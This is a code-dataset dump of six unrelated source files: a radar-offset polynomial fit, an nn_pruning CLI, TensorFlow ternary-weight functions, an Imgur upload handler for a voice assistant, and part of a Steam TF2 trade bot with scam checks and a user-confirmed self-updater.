max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
tests/config/test_manager.py
|
NishanBanga/JobFunnel
| 1,652 |
84327
|
# FIXME: need to break down config manager testing a bit more
# @pytest.mark.parametrize('pass_del_cfg', (True, False))
# def test_config_manager_init(mocker, pass_del_cfg):
# """NOTE: unlike other configs this one validates itself on creation
# """
# # Mocks
# patch_del_cfg = mocker.patch('jobfunnel.config.manager.DelayConfig')
# patch_os = mocker.patch('jobfunnel.config.manager.os')
# patch_os.path.exists.return_value = False # check it makes all paths
# mock_master_csv = mocker.Mock()
# mock_block_list = mocker.Mock()
# mock_dupe_list = mocker.Mock()
# mock_cache_folder = mocker.Mock()
# mock_search_cfg = mocker.Mock()
# mock_proxy_cfg = mocker.Mock()
# mock_del_cfg = mocker.Mock()
# # FUT
# cfg = JobFunnelConfigManager(
# master_csv_file=mock_master_csv,
# user_block_list_file=mock_block_list,
# duplicates_list_file=mock_dupe_list,
# cache_folder=mock_cache_folder,
# search_config=mock_search_cfg,
# delay_config=mock_del_cfg if pass_del_cfg else None,
# proxy_config=mock_proxy_cfg,
# log_file='', # TODO optional?
# )
# # Assertions
|
components/stdproc/stdproc/offsetpoly/test/offpoly.py
|
vincentschut/isce2
| 1,133 |
84352
|
<reponame>vincentschut/isce2<gh_stars>1000+
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import isce
import stdproc
import isceobj
import logging
import numpy as np
from Poly2d import Polynomial
from stdproc.stdproc.offsetpoly.Offsetpoly import Offsetpoly
logger = logging.getLogger('dense')
def load_pickle(step='outliers1'):
import cPickle
insarObj = cPickle.load(open('PICKLE/{0}'.format(step), 'rb'))
return insarObj
def runOffPolyISCE(offField):
'''
Estimate polynomial here.
'''
inArr = np.array(offField.unpackOffsets())
x = inArr[:,0]
y = inArr[:,2]
dx = inArr[:,1]
dy = inArr[:,3]
sig = inArr[:,4]
obj = Offsetpoly()
obj.setLocationAcross(list(x))
obj.setLocationDown(list(y))
obj.setSNR(list(sig))
obj.setOffset(list(dy))
obj.offsetpoly()
val = obj.offsetPoly
# print('Range: ', val)
azpol = Polynomial(rangeOrder=2, azimuthOrder=2)
azpol.setCoeffs([[val[0],val[1],val[4]],
[val[2], val[3]],
[val[5]]])
obj.setOffset(list(dx))
obj.offsetpoly()
val = obj.offsetPoly
# print('Azimuth: ', val)
rgpol = Polynomial(rangeOrder=2, azimuthOrder=2)
rgpol.setCoeffs([[val[0],val[1],val[4]],
[val[2], val[3]],
[val[5]]])
return azpol, rgpol
def runOffPoly(offField):
'''
Estimate polynomial here.
'''
inArr = np.array(offField.unpackOffsets())
x = inArr[:,0]
y = inArr[:,2]
dx = inArr[:,1]
dy = inArr[:,3]
sig = inArr[:,4]
snr = 1.0 + 1.0/sig
xOrder = 2
yOrder = 2
#####Normalization factors
ymin = np.min(y)
ynorm = np.max(y) - ymin
if ynorm == 0:
ynorm = 1.0
yoff = np.int(np.round(np.mean(dy)))
y = (y - ymin)/ynorm
xmin = np.min(x)
xnorm = np.max(x) - xmin
if xnorm == 0:
xnorm = 1.0
x = (x-xmin)/xnorm
arrList = []
for ii in range(yOrder + 1):
yfact = np.power(y, ii)
for jj in range(yOrder + 1-ii):
temp = np.power(x,jj)* yfact
arrList.append(temp.reshape((temp.size,1)))
A = np.hstack(arrList)
A = A / snr[:,None]
b = dy / snr
val, res, rank, eigs = np.linalg.lstsq(A,b, rcond=1.0e-12)
print('Az Chi : ', np.sqrt(res/(1.0*len(b))))
azpol = Polynomial(rangeOrder=2, azimuthOrder=2)
azpol.setCoeffs([val[0:3],val[3:5],val[5:]])
azpol._meanRange = xmin
azpol._normRange = xnorm
azpol._meanAzimuth = ymin
azpol._normAzimuth = ynorm
b = dx/snr
val,res, rank, eigs = np.linalg.lstsq(A,b, rcond=1.0e-12)
print('Rg chi : ', np.sqrt(res/(1.0*len(b))))
rgpol = Polynomial(rangeOrder=2, azimuthOrder=2)
rgpol.setCoeffs([val[0:3],val[3:5],val[5:]])
rgpol._meanRange = xmin
rgpol._normRange = xnorm
rgpol._meanAzimuth = ymin
rgpol._normAzimuth = ynorm
return azpol, rgpol
if __name__ == '__main__':
iObj = load_pickle()
print('Done loading pickle')
width = iObj.getReferenceSlcImage().getWidth()
length = iObj.getReferenceSlcImage().getLength()
print('Image Dimensions: ', length, width)
print('Results from numpy code')
azpol, rgpol = runOffPoly(iObj.getRefinedOffsetField())
print('Upper Left: ', rgpol(1,0), azpol(1,0))
print('Upper Right: ', rgpol(1,width-1), azpol(1,width-1))
print('Lower Left: ', rgpol(length+1,0), azpol(length+1,0))
print('Lower Right: ', rgpol(length+1,width-1), azpol(length+1,width-1))
print('Results from old method')
az1, rg1 = runOffPolyISCE(iObj.getRefinedOffsetField())
print('Upper Left: ', rg1(1,0), az1(1,0))
print('Upper Right: ', rg1(1,width-1), az1(1,width-1))
print('Lower Left: ', rg1(length+1,0), az1(length+1,0))
print('Lower Right: ', rg1(length+1,width-1), az1(length+1,width-1))
|
analysis/command_line.py
|
ebell495/nn_pruning
| 250 |
84362
|
<gh_stars>100-1000
#!/usr/bin/env python
import click
import json
import sh
from pathlib import Path
from datetime import datetime
from analyze_run import ModelAnalysis
from create_model import Packager
from plot import main_plot
import os
import sys
from aws_download import AWSExperienceDownloader
@click.group()
@click.pass_context
def cli(ctx):
ctx.obj = {}
@cli.command()
@click.argument("bucket", type=str)
@click.argument("output", default=None, type=click.Path(resolve_path=True, exists=True))
@click.option("-p", "--pattern", type=str, multiple=True)
def download(bucket, output, pattern):
"""Download SageMaker results and unpack them"""
downloader = AWSExperienceDownloader(bucket,
Path("__file__").parent / "tmp",
output)
for p in pattern:
downloader.load(pattern=p)
@cli.command()
@click.argument("input", default=None, type=click.Path(resolve_path=True, exists=True))
@click.argument("output", default="s3://lagunas-sparsity-experiments/backup/nn_pruning/output", type=str)
@click.option("--clean-train-files", is_flag=True, help="remove optimizer.pt files")
@click.option("--dryrun", is_flag=True, help="")
def upload(input, output, clean_train_files, dryrun):
"""Upload all model checkpoints to s3 for archival. You may want to remove large files like optimizer.pt before that."""
if clean_train_files:
to_remove = ["optimizer.pt"]
for root, subFolders, files in os.walk(input):
for file in files:
if file in to_remove:
path = Path(root) / file
print(f"Removing train file {path}")
if not dry_run:
path.unlink()
if dryrun:
dry_run_command = ["--dryrun"]
else:
dry_run_command = []
command = ["s3", "sync"] + dry_run_command + ["--follow-symlinks", input, output]
sh.aws(*command, _out = sys.stdout)
TASKS = ["squadv1", "squadv2", "cnn_dailymail", "mnli", "qqp", "sst2"]
@cli.command()
@click.argument("input", default=None, type=click.Path(resolve_path=True, exists=True))
@click.option("--output", default="files/results", type=str, help="Base name of the output json files.")
@click.option("--task", default=TASKS, type=str, multiple=True)
@click.option("--dataset-config", default=None, type=str, help="The configuration name of the dataset to use.")
@click.option("--force-speed", is_flag=True, help="Force reevaluation of model speed.")
@click.option("--skip-check", is_flag=True, help="Keep legacy models (that did not pruned bias) and more generally models that have different eval results after pruning, so use wisely.")
def analyze(input, output, task, dataset_config, force_speed, skip_check):
"""Analyze all the directories 'd' in INPUT, and each run in d (each run contains N checkpoints), then write a json file for each task, named OUTPUT_{task}.json.
Each directory 'd' name should starts with '{task}_' indicating which task it contains.
(squad for squadv1, squadv2 or squad_v2 for squadv2, mnli, ccnews for cnn_dailymail. See ModelAnalysis class for for more information).
"""
for t in task:
ma = ModelAnalysis(input,
output,
t,
dataset_config_name=dataset_config,
force_speed=force_speed,
prefixes = ["fine_tuned_", "hp_", "aws_", "large_"],
exclude_non_matching_f1=not skip_check)
ma.run()
@cli.command()
@click.option("--results", default="files/results", type=str, help="Base name of the results json files.")
@click.option("--task", default=TASKS, type=str, multiple=True)
def plot(results, task):
main_plot(results, task)
MODEL_KINDS = ["hybrid", "hybrid-filled", "unstruct"]
@cli.command()
@click.argument("checkpoint", default=None, type=click.Path(exists=True))
@click.argument("kind", default=None, type = click.Choice(MODEL_KINDS))
@click.argument("task", default=None, type= click.Choice(TASKS))
@click.argument("user", default=None, type = str)
@click.argument("dest", default=None, type= click.Path(resolve_path=False, exists=True))
@click.option("--results", default="files/results", type=str, help="Base name of the output json files.")
@click.option("--only-name", is_flag=True, help="Only print what would be the name of the git.")
def model_upload(checkpoint, kind, task, user, dest, results, only_name):
# Upload a model to the hub. This includes compiling the model, extracting statistics, preparing a model card etc.
p = Packager(user, f"{results}_{task}.json", checkpoint, dest, kind = kind, task = task)
p.run(only_name=only_name)
@cli.command()
@click.argument("user", default=None, type = str)
@click.argument("password", default=<PASSWORD>, type = str)
@click.argument("model_name", default=None, type = str)
def delete_hub_model(user, password, model_name):
import transformers.hf_api as hf_api
api = hf_api.HfApi()
token = api.login(user, password)
for m in api.model_list():
if "madlag" in m.modelId and "ampere" in m.modelId:
print(m.modelId)
api.delete_repo(token=token, name=model_name)
@cli.command()
@click.argument("user", default=None, type = str)
@click.argument("password", default=None, type = str)
def list_models(user, password):
import transformers.hf_api as hf_api
api = hf_api.HfApi()
token = api.login(user, password)
for m in api.model_list():
if user in m.modelId:
print(m.modelId)
@cli.command()
@click.pass_context
@click.argument("basedir", type=click.Path(resolve_path=True), nargs = 1)
@click.argument('result_files', type=click.Path(resolve_path=True), nargs=-1) #help="Result files used as whitelist (files/results_*.json for example) "
@click.option('--execute', is_flag=True)
def clean(ctxt, basedir, result_files, execute):
"""Clean the checkpoints to save disk space and only keep the best ones referenced in json results files (like files/results*_.json).
You may want to run the 'upload' command before doing this to backup all the checkpoints.
This only removes the "pytorch_model.bin" files
"""
if execute:
click.echo("EXECUTING")
else:
click.echo("DRY RUN")
click.echo("Base dir")
click.echo(" " + basedir)
click.echo()
click.echo("Result files:")
for r in result_files:
click.echo(" " + r)
click.echo()
if len(result_files) == 0:
click.Abort("Empty result files")
whitelist = {}
for filename in result_files:
with open(filename) as f:
single_whitelist = json.load(f)["checkpoints"]
for k in single_whitelist:
whitelist[k] = True
click.echo("Whitelisted checkpoints:")
whitelisted = len(whitelist)
click.echo(f" {whitelisted}")
click.echo()
kept = {}
removed = {}
removed_size = 0
def find_whitelisted_checkpoint(whitelist, dir):
dir = str(dir.resolve())
for k in whitelist:
if k.startswith(dir):
return True
return False
for dir in Path(basedir).iterdir():
if not find_whitelisted_checkpoint(whitelist, dir):
click.echo(click.style(f"excluded {dir} (no whitelisted checkpoint in this base directory)", fg='red'))
continue
click.echo(click.style(f"scanning {dir} ", fg='green'))
set_dir = dir.resolve()
for hp_name in set_dir.iterdir():
for checkpoint in hp_name.iterdir():
checkpoint_str = str(checkpoint)
if checkpoint_str in whitelist:
kept[checkpoint_str] = True
else:
model_file = checkpoint / "pytorch_model.bin"
if model_file.exists():
removed[model_file] = True
removed_size += model_file.stat().st_size
click.echo("Kept / Whitelisted")
click.echo(f" {len(kept)} / {whitelisted}")
click.echo()
click.echo("Removed")
click.echo(f" {len(removed)} pytorch_model.bin files")
click.echo(" %0.2fGB" % (removed_size / (1024**3)))
if execute:
d = datetime.now().replace(microsecond=0)
d = d.isoformat().replace(":", "_").replace("T", "_")
removed_filename = "files/removed_files_%s.json" % d
click.echo()
with Path(removed_filename).open("w") as f:
for model_file in removed:
f.write(str(model_file) + "\n")
for model_file in removed:
# click.echo("REMOVING", model_file)
model_file.unlink()
click.echo("Wrote removed files list to:")
click.echo(f" {removed_filename}")
def main():
return cli()
if __name__ == "__main__":
main()
|
examples/Ternary-Net/ternary.py
|
skoppula/ternarynet
| 109 |
84374
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
G = tf.get_default_graph()
def p_ternarize(x, p):
x = tf.tanh(x)
shape = x.get_shape()
thre = tf.get_variable('T', trainable=False, collections=[tf.GraphKeys.VARIABLES, 'thresholds'],
initializer=0.05)
flat_x = tf.reshape(x, [-1])
k = int(flat_x.get_shape().dims[0].value * (1 - p))
topK, _ = tf.nn.top_k(tf.abs(flat_x), k)
update_thre = thre.assign(topK[-1])
tf.add_to_collection('update_thre_op', update_thre)
mask = tf.zeros(shape)
mask = tf.select((x > thre) | (x < -thre), tf.ones(shape), mask)
with G.gradient_override_map({"Sign": "Identity", "Mul": "Add"}):
w = tf.sign(x) * tf.stop_gradient(mask)
tf.histogram_summary(w.name, w)
return w
def tw_ternarize(x, thre):
shape = x.get_shape()
thre_x = tf.stop_gradient(tf.reduce_max(tf.abs(x)) * thre)
w_p = tf.get_variable('Wp', collections=[tf.GraphKeys.VARIABLES, 'positives'], initializer=1.0)
w_n = tf.get_variable('Wn', collections=[tf.GraphKeys.VARIABLES, 'negatives'], initializer=1.0)
tf.scalar_summary(w_p.name, w_p)
tf.scalar_summary(w_n.name, w_n)
mask = tf.ones(shape)
mask_p = tf.select(x > thre_x, tf.ones(shape) * w_p, mask)
mask_np = tf.select(x < -thre_x, tf.ones(shape) * w_n, mask_p)
mask_z = tf.select((x < thre_x) & (x > - thre_x), tf.zeros(shape), mask)
with G.gradient_override_map({"Sign": "Identity", "Mul": "Add"}):
w = tf.sign(x) * tf.stop_gradient(mask_z)
w = w * mask_np
tf.histogram_summary(w.name, w)
return w
|
melissa/actions/imgur_handler.py
|
blacksparrow6/Melissa-Core
| 554 |
84378
|
<filename>melissa/actions/imgur_handler.py
import os
import sqlite3
from datetime import datetime
from imgurpython import ImgurClient
# Melissa
from melissa import profile
from melissa.tts import tts
WORDS = {'image_uploader': {'groups': ['upload']},
'show_all_uploads': {'groups': [['all', 'uploads'],
['all', 'images'], ['uploads']]}}
def img_list_gen():
image_list = []
valid_image_extensions = [".tiff", ".png", ".gif", ".jpg"]
for root, _, files in os.walk(profile.data['images_path']):
for filename in files:
if os.path.splitext(filename)[1] in valid_image_extensions:
image_list.append(os.path.join(root, filename.lower()))
return image_list
def image_uploader(speech_text):
if profile.data['imgur']['client_id'] == "xxxx" \
or profile.data['imgur']['client_secret'] == "xxxx":
msg = 'upload requires a client id and secret'
print msg
tts(msg)
return
words_of_message = speech_text.split()
words_of_message.remove('upload')
cleaned_message = ' '.join(words_of_message)
if len(cleaned_message) == 0:
tts('upload requires a picture name')
return
image_listing = img_list_gen()
client = ImgurClient(profile.data['imgur']['client_id'],
profile.data['imgur']['client_secret'])
for i in range(0, len(image_listing)):
if cleaned_message in image_listing[i]:
result = client.upload_from_path(image_listing[i], config=None,
anon=True)
conn = sqlite3.connect(profile.data['memory_db'])
conn.execute("INSERT INTO image_uploads "
"(filename, url, upload_date) VALUES (?, ?, ?)",
(image_listing[i], result['link'],
datetime.strftime(datetime.now(), '%d-%m-%Y')))
conn.commit()
conn.close()
print result['link']
tts('Your image has been uploaded')
def show_all_uploads(text):
conn = sqlite3.connect(profile.data['memory_db'])
cursor = conn.execute("SELECT * FROM image_uploads")
for row in cursor:
print(row[0] + ': (' + row[1] + ') on ' + row[2])
tts('Requested data has been printed on your terminal')
conn.close()
|
bot.py
|
Zwork101/tf2_trade_bot
| 150 |
84396
|
import os
import sys
import json
import time
from distutils.version import LooseVersion
import importlib
import pip
from enum import Enum
import logging
import csv
import subprocess
try:
main = pip.main
except AttributeError:
# module 'pip' has no attribute 'main'
from pip._internal import main
apikey = ''
password = ''
username = ''
bkey = ''
buy_trades = {}
sell_trades = {}
items = {}
key_price = 0
bud_price = 0
escrow = None
whitelist = []
currencies = {'bud':'Earbuds', 'ref':'Refined Metal', 'rec':'Reclaimed Metal', 'scrap':'Scrap Metal', 'key':'Mann Co. Supply Crate Key'}
packages = ['steampy', 'requests']
declined_trades = None
past_time = time.time()
start_time = time.time()
logging.basicConfig(filename='trade.log', level=logging.DEBUG,
format='[%(asctime)s][%(levelname)s][%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
start_text = """
_____ _____ ____ _____ ____ _ ____ U _____ u ____ U ___ u _____
|_ " _| |" ___||___"\ |_ " _|U | _"\ u U /"\ u | _"\ \| ___"|/ U | __")u \/"_ \/|_ " _|
| | U| |_ uU __) | | | \| |_) |/ \/ _ \/ /| | | | | _|" \| _ \/ | | | | | |
/| |\ \| _|/ \/ __/ \ /| |\ | _ < / ___ \ U| |_| |\| |___ | |_) |.-,_| |_| | /| |\
u |_|U |_| |_____|u u |_|U |_| \_\ /_/ \_\ |____/ u|_____| |____/ \_)-\___/ u |_|U
_// \\\_ )(\\\,- << // _// \\\_ // \\\_ \\\ >> |||_ << >> _|| \\\_ \\\ _// \\\_
(__) (__)(__)(_/(__)(__) (__) (__)(__) (__)(__) (__)(__)_) (__) (__) (__) (__) (__) (__) (__)
Created by: Zwork101 Github: https://github.com/Zwork101 Steam: https://steamcommunity.com/id/ZWORK101
THIS VERSION IS NO LONGER UNDER DEVELOPMENT AND BUGS WILL NOT BE FIXED. IT IS HIGHLY RECOMMENDED TO SWITCH
TO THE NEW VERSION. YOU CAN FIND THIS AT: https://github.com/mninc/tf2-trade-bot-2\n
"""
class TradeOfferStatus(Enum):
INVALID = 1
ACTIVE = 2
ACCEPTED = 3
EXPIRED = 4
CANCELED = 6
INVALID_ITEMS = 8
WAIT_CONF = 9
WAIT_SFAC = 10
ESCROW = 11
class TradeManager:
"""
The manager for trades. This will be used to organize trades and keep everything from falling apart.
Prams: client (steampy.client.SteamClient object) and conf (steampy.confirmation.ConfirmationExecutor)
Public values: client and conf (see above)
Public functions: accept, check_trades_content, get_new_trades, check_good_trades, check_bad_trades
"""
def __init__(self, client, conf):
self._trades = []
self._pending_trades = []
self._try_confs = []
self._declined_trades = []
self.client = client
self.conf = conf
def decline(self, trade):
if decline_trades:
self.client.decline_trade_offer(trade.id)
if trade.id not in self._declined_trades:
self._declined_trades.append(trade.id)
def accept(self, trade):
"""
The accept function handles accepting trades. This is important, because different errors could occur.
Prams: (self), trade (Trade object)
Output: None
"""
try:
self.client.accept_trade_offer(trade.id)
return True
except BaseException as BE:
if BE.__class__ == KeyError:
print(f'ERROR: Issue confirming trade: {trade.id}, trying again')
#self._trades.remove(trade)
self._pending_trades.append(trade)
logging.warning(f'TRADE ACCEPT ERROR: {type(BE).__name__}: {BE}')
return False
def check_trades_content(self):
"""
This will check the current trades in self._pending_trades and decide if they are correct or not
Then it will move the good trades to self._declined_trades and self._trades after acccepting/declining
trade offers.
Prams: (self)
Output: None
"""
for trade in range(len(self._pending_trades)-1,-1,-1):
trade = self._pending_trades[trade]
sell_value = 0
buy_value = 0
extra_sell = []
extra_buy = []
if not trade.items_to_give:
self._pending_trades.remove(trade)
self._trades.append(trade)
self.accept(trade)
continue
exit_trade = False
for item in trade.items_to_give:
if not exit_trade:
if item not in sell_trades:
if item in currencies.values():
extra_sell.append(item)
else:
print('[TRADE]: Unknown item we\'re giving, declining')
self.decline(trade)
self._pending_trades.remove(trade)
logging.info("DECLINING TRADE WITH UN-KNOWN ITEM")
exit_trade = True
else:
sell_value = add_values(float(sell_trades[item]), float(sell_value))
if exit_trade:
continue
for item in trade.items_to_receive:
if item in buy_trades:
buy_value = add_values(float(buy_trades[item]), float(buy_value))
elif item in currencies.values():
extra_buy.append(item)
sell_curr = sort(extra_sell)
buy_curr = sort(extra_buy)
sell_value += calculate(sell_curr[0], sell_curr[1], sell_curr[2], sell_curr[3], sell_curr[4])
buy_value += calculate(buy_curr[0], buy_curr[1], buy_curr[2], buy_curr[3], buy_curr[4])
if sell_value <= buy_value:
print(f'[TRADE]: Looks good! They gave us:\n{str(trade.items_to_receive)}')
print(f'[TRADE]: We gave them:\n{str(trade.items_to_give)}')
print('[TRADE]: Attempting to accept offer')
try:
logging.info(f"ATTEMPTING TRADE: {trade.id}\nSELL: {sell_value} BUY:{buy_value}\n{trade.trade}")
self._trades.append(trade)
self._pending_trades.remove(trade)
self.accept(trade)
except ConfirmationExpected:
logging.warning(f'FAILED TO CONFIRM TRADE: {trade.id} (FIRST TRY)')
self._try_confs.append(trade.id)
else:
print(f'[TRADE]: No good! They offered us:\n{str(trade.items_to_receive)}')
print(f'[TRADE]: For our:\n{str(trade.items_to_give)}')
print('[TRADE]: Declining offer')
logging.info(f"DECLINING INVALID TRADE: {trade.id}\nSELL: {sell_value} BUY:{buy_value}\n{trade.trade}")
self.decline(trade)
self._pending_trades.remove(trade)
def get_new_trades(self):
"""
Collects new trades, will compare them to current trades to ensure they are new. Accepts if the sender
is whitelisted, delcines if the user is a scammer or escrow. If not, moved it to
self._pending_trades (list)
Prams: (self)
Output: None
"""
new_trades = client.get_trade_offers()['response']
#logging.debug(new_trades)
for new_trade in new_trades['trade_offers_received']:
if (not new_trade['tradeofferid'] in [t.id for t in self._trades]) \
or (new_trade['tradeofferid'] in self._declined_trades):
id64 = 76561197960265728 + new_trade['accountid_other']
trade = Trade(new_trade, id64)
logging.info(f"FOUND NEW TRADE: {trade.id}")
if str(id64) in whitelist:
print(f"[WHITELIST]: Neat! The user sending this trade is whitelisted! Attempting confirmation (STEAM ID:{id64})")
logging.info(f'TRADE WHITELISTED ATTEMPTING TRADE: {trade.id}')
self.accept(trade)
self._trades.append(trade)
continue
print(f'[TRADE]: Found trade (ID: {trade.id})')
if self._check_partner(trade):
if not accept_escrow and trade.escrow:
print("[TRADE]: Trade is escrow, declining")
logging.info(f'DECLINING ESCROW TRADE: {trade.trade}')
self.decline(trade)
else:
self._pending_trades.append(trade)
def _check_partner(self, trade):
"""
To check if the user is a scammer from backpack.tf and steamrep. This uses the backpack.tf API.
The API will supply the steamrep stats for the user. If the user is a scammer, it
will decline the trade and move it to self._declined_trades.
Prams: (self), trade (Trade object)
Output: None
"""
print("[TRADE]: Checking for trade bans on backpack.tf and steamrep.com")
rJson = requests.get(f"https://backpack.tf/api/users/info/v1?",
data={'key':bkey, 'steamids':trade.other_steamid}).json()
logging.debug(str(rJson))
if "bans" in rJson['users'][trade.other_steamid].keys():
if "steamrep_caution" in rJson['users'][trade.other_steamid]['bans'] or \
"steamrep_scammer" in rJson['users'][trade.other_steamid]['bans']:
print("[steamrep.com]: SCAMMER")
print('[TRADE]: Ending trade...')
logging.info(f"DECLINED SCAMMER (ID:{trade.other_steamid})")
self.decline(trade)
return False
print('[steamrep.com]: User is not banned')
if "all" in rJson['users'][trade.other_steamid]['bans']:
print('[backpack.tf]: SCAMMER')
print('[TRADE]: Ending trade...')
logging.info(f"DECLINED SCAMMER (ID:{trade.other_steamid})")
self.decline(trade)
return False
print('[backpack.tf]: User is clean')
print("[backpack.tf/steamrep.com]: User is clean")
return True
def check_bad_trades(self):
"""
Looks at the current trades in self._trades and checks if the trade has become invalid (eg
if the trade was cancled). It will remove it from trades and report what happened to the user
Prams: (self)
Output: None
"""
for trade_index in range(len(self._trades)-1, -1, -1):
trade = self._trades[trade_index]
status = trade.status()
if status == TradeOfferStatus.INVALID.value:
print(f'[ERROR]: Trade offer id {trade.id} seems to be invalid')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME invalid')
elif status == TradeOfferStatus.CANCELED.value:
print(f'[TRADE]: Trade {trade.id} was canceled.')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME canceled')
elif status == TradeOfferStatus.EXPIRED.value:
print(f'[TRADE]: Trade {trade.id} has expired... How did that happen?')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME expired')
elif status == TradeOfferStatus.INVALID_ITEMS.value:
print(f'[TRADE]: Items attempting to trade became invalid. {trade.id}')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME invalid_items')
elif status == TradeOfferStatus.ESCROW.value and not accept_escrow:
print('[ERROR]: Whoops, escrow trade was confirmed. Sorry about that')
self._trades.remove(trade)
logging.fatal(f'ACCEPTED ESCROW TRADE')
def check_good_trades(self):
"""
This method does 2 things. The first thing it does is check to see if trades have been accepted.
If they have, they will be removed from self._trades and will report that the trade was accepted.
The second thing is to try and confirm trades that are having issues confirming. If it was confirmed,
it will be removed from self._try_confs, and report to user it was confirmed.
Prams: (self)
Output: None
"""
for trade_index in range(len(self._trades) - 1, -1, -1):
trade = self._trades[trade_index]
status = trade.status()
if status == TradeOfferStatus.ACCEPTED.value:
print(f'[TRADE]: Accepted trade {trade.id}')
self._trades.remove(trade)
logging.info(f'TRADE {trade.id} WAS ACCEPTED')
def confirm_check(self):
if confirm_settings == 'all':
logging.debug('ACCEPTING EVERYTHING')
for confirmation in self.conf._get_confirmations():
self.conf._send_confirmation(confirmation)
logging.info(f'SENT CONFIRMATION FOR CONF WITH ID OF {confirmation.id}')
elif confirm_settings == 'trade':
for tradeid in self._try_confs:
try:
self.conf.send_trade_allow_request(tradeid)
print(f'[TRADE]: Accepted trade {tradeid}')
logging.info(f'TRADE {tradeid} WAS ACCEPTED (after manual confirmation)')
self._try_confs.remove(tradeid)
except ConfirmationExpected:
logging.debug(f'CONFIRMATION FAILED ON {tradeid}')
class Trade:
"""
This is an object mainly to store data about a trade, and make it easy to access. It can also
the currency in the trade and fetch the status of the trade.
Prams: trade_json (dict), other_steamid (str)
Public values: self.trade (dict), self.escrow (int), self.items_to_give (list), self.items_to_receive (list),
self.id (int/str), self.other_steamid (str)
Public functions: sort, status
"""
def __init__(self, trade_json:dict, other_steamid:int):
self.trade = trade_json
self.escrow = int(trade_json['escrow_end_date'])
self.items_to_give = self._items_to_give()
self.items_to_receive = self._items_to_receive()
self.id = trade_json["tradeofferid"]
self.other_steamid = str(other_steamid)
def _items_to_receive(self):
"""
Adds all items to self.items_to_receive as their market name. Should only be used in initialization.
Prams: (self)
Output: item_names (list)
"""
item_names = []
for assetID in self.trade['items_to_receive']:
item_names.append(self.trade['items_to_receive'][assetID]['market_name'])
return item_names
def _items_to_give(self):
"""
Adds all items to self.items_to_give as their market name. Should only be used in initialization.
Prams: (self)
Output: item_names (list)
"""
item_names = []
for assetID in self.trade['items_to_give']:
item_names.append(self.trade['items_to_give'][assetID]['market_name'])
return item_names
def sort(self, typ):
"""
Counts the amount of a currency type there is in one side of the trade. "sort" is sort
of misleading (see what I did there), it just counts how many scraps, recs, ref, keys and
buds there are.
Prams: (self), type (str)
Output: curr (list)
"""
if typ == 'sell':
return sort(self.items_to_receive)
else:
return sort(self.items_to_give)
def status(self):
"""
Fetches the status of the trade from steam. This way we can get live data.
Prams: (self)
Output: trade_json['trade_offer_state'] (int/str)
"""
try:
trade_json = client.get_trade_offer(self.id)['response']['offer']
except KeyError:
#If key error, the trade doesn't exist anymore. If so, it's invalid
trade_json = {'trade_offer_state':1}
return trade_json['trade_offer_state']
def add_values(v1, v2):
v1_rem, v2_rem = int(str(v1).split('.')[1]), int(str(v2).split('.')[1])
ref = int(v1) + int(v2)
v1_rec, v2_rec = v1_rem // 33, v2_rem // 33
v1_rem, v2_rem = v1_rem - v1_rec * 33, v2_rem - v2_rec * 33
srp_added = v1_rem + v2_rem
v1_rec += srp_added // 33
srp_added -= (srp_added // 33) * 33
rec_added = v1_rec + v2_rec
ref += rec_added // 3
rec_added -= (rec_added // 3) * 3
return float(str(ref) + '.' + str(rec_added*33 + srp_added))
def sort(items:list):
curr = [0,0,0,0,0]
for item in items:
if item == currencies['scrap']:
curr[0] += 1
elif item == currencies['rec']:
curr[1] += 1
elif item == currencies['ref']:
curr[2] += 1
elif item == currencies['key']:
curr[3] += 1
elif item == currencies['bud']:
curr[4] += 1
return curr
def check_for_updates():
with open('__version__', 'r') as file:
curr_version = file.read()
r = requests.get('https://raw.githubusercontent.com/Zwork101/tf2-trade-bot/master/__version__')
new_version = r.text
if LooseVersion(new_version) > LooseVersion(curr_version):
print('[PROGRAM]: A new version is available, would you like to install?')
yn = input('[y/n]: ')
if yn[0].lower() == 'y':
print('[Installer]: Starting installation...', end='')
bot_update = requests.get('https://raw.githubusercontent.com/Zwork101/tf2-trade-bot/master/bot.py')
with open('__version__', 'w') as file:
file.write(new_version)
print('.', end='')
with open('bot.py', 'w') as file:
file.write(bot_update.text)
print('.')
print('Update complete! Restart now.')
input('press enter to close program...\n')
os._exit(0)
def calculate(scrapC, recC, refC, keyC, budC):
#For each currency, add it using add_values function
total_value = 0.0
for scrap in range(scrapC):
total_value = add_values(total_value, .11)
for rec in range(recC):
total_value = add_values(total_value, .33)
for ref in range(refC):
total_value = add_values(total_value, 1.0)
for key in range(keyC):
total_value = add_values(total_value, float(key_price))
for bud in range(budC):
total_value = add_values(total_value, float(bud_price))
return total_value
def check_install(pkg, c, imp=''):
try:
importlib.import_module(pkg)
print(f'[PROGRAM]: Required package is installed {c}/{len(packages)}')
logging.debug(f"MODULE {pkg} IS INSTALLED")
except:
logging.info(f"MODULE {pkg} IS NOT INSTALLED")
if imp:
pkg = imp
